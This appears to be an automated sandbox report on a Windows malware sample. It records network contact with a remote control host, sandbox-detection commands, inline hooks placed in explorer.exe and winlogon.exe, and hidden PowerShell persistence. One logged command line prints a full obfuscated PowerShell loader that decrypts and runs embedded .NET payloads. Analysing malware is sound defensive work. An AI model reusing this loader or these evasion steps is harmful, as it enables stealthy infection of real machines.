Oct 3, 2024 14:55:29.207721949 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.207789898 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:29.213809013 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.595963955 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.643487930 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:29.758390903 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.799854040 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:29.812551022 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:29.812589884 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:29.817682981 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.817728043 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.817755938 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:29.817785025 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.145507097 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.190321922 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:30.304081917 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.329154968 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:30.334089994 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.334479094 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:30.339277029 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.720752954 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.768538952 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:30.882380009 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.924853086 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:30.925806999 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:30.930629969 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:30.930722952 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:30.935547113 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:31.299798965 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:31.346724987 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:31.460278034 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:31.500519037 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:31.505446911 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:31.505516052 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:31.510375977 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:31.883109093 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:31.924844980 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.038852930 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:32.081056118 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.082640886 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.087516069 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:32.087630987 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.092504025 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:32.532124996 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:32.581036091 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.616620064 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:32.659086943 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.660301924 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.665266037 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:32.665347099 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:32.670373917 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.044868946 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.096606016 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.194919109 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.252857924 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.397836924 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.400589943 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.400645018 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.402770042 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405527115 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405558109 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405603886 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405668974 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405697107 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405725002 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405777931 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405807972 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405875921 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405952930 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.405982971 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.406035900 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.406080008 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.406097889 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.406115055 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.406143904 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.406171083 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.406199932 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.752473116 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.799730062 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.935945988 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.970238924 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.975142956 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:33.975331068 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:33.980297089 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:34.356430054 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:34.409187078 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:34.507344961 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:34.530821085 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:34.535670996 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:34.536372900 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:34.541179895 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:34.909305096 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:34.956020117 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:35.071238995 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:35.109463930 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:35.114448071 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:35.114772081 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:35.119594097 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:35.481880903 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:35.534101009 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:35.632613897 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:35.657392025 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:35.664254904 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:55:35.664319992 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:55:35.669156075 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:56:00.674808025 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:56:00.680794001 CEST	6969	49719	154.216.20.132	192.168.2.7
Oct 3, 2024 14:56:25.721761942 CEST	49719	6969	192.168.2.7	154.216.20.132
Oct 3, 2024 14:56:25.727423906 CEST	6969	49719	154.216.20.132	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 14:55:07.449938059 CEST	53784	53	192.168.2.7	1.1.1.1
Oct 3, 2024 14:55:07.671873093 CEST	53	53784	1.1.1.1	192.168.2.7
Oct 3, 2024 14:55:08.878645897 CEST	60989	53	192.168.2.7	1.1.1.1
Oct 3, 2024 14:55:08.886673927 CEST	53	60989	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 14:55:07.449938059 CEST	192.168.2.7	1.1.1.1	0x74e0	Standard query (0)	azure-winsecure.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:55:08.878645897 CEST	192.168.2.7	1.1.1.1	0x9280	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 14:54:06.634582043 CEST	1.1.1.1	192.168.2.7	0x61d4	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:54:06.634582043 CEST	1.1.1.1	192.168.2.7	0x61d4	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:54:49.902795076 CEST	1.1.1.1	192.168.2.7	0xf08f	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:54:49.902795076 CEST	1.1.1.1	192.168.2.7	0xf08f	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:55:07.671873093 CEST	1.1.1.1	192.168.2.7	0x74e0	No error (0)	azure-winsecure.com	154.216.20.132	A (IP address)	IN (0x0001)	false
Oct 3, 2024 14:55:08.886673927 CEST	1.1.1.1	192.168.2.7	0x9280	No error (0)	ipwho.is	195.201.57.90	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipwho.is

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49720	195.201.57.90	443	5760	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 12:55:09 UTC	150	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Host: ipwho.is Connection: Keep-Alive
2024-10-03 12:55:09 UTC	223	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 12:55:09 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2024-10-03 12:55:09 UTC	1019	IN	Data Raw: 33 65 66 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 Data Ascii: 3ef{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.33", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yor

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	08:53:53
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" "
Imagebase:	0x7ff75e990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:53:53
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:53:53
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff6d12f0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:53:53
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff6d4a50000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:53:54
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff6d12f0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:53:54
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff6d4a50000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:53:56
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Imagebase:	0x7ff75e990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:53:56
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:54:04
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
Imagebase:	0x7ff7e77e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:23:03
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff75e990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:23:03
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:23:03
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Imagebase:	0x7ff75e990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:23:03
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 6068, Parent PID: 4268

General

Target ID:	20
Start time:	10:23:04
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:	0x7ff75e990000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	10:23:04
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	10:23:04
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff6d12f0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:23:04
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff6d4a50000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:23:05
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff6d12f0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
